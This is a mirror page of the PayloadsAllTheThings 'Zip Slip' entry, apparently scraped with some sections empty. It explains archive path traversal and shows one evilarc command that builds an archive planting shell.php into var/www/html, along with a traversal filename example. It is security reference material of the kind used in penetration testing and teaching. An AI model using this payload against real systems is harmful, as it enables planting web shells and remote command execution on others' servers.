1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-08 02:26:08 +02:00
PayloadsAllTheThings/Upload Insecure Files/Zip Slip
Markus 950114b9e6
Zip Slip: Add slipit to tools
2022-10-03 18:19:28 +02:00
..
README.md Zip Slip: Add slipit to tools 2022-10-03 18:19:28 +02:00

Zip Slip

The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victims machine.

Summary

Detection

  • Any zip upload page on the application

Tools

Exploits

Basic Exploit

Using evilarc:

python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15

Additional Notes

References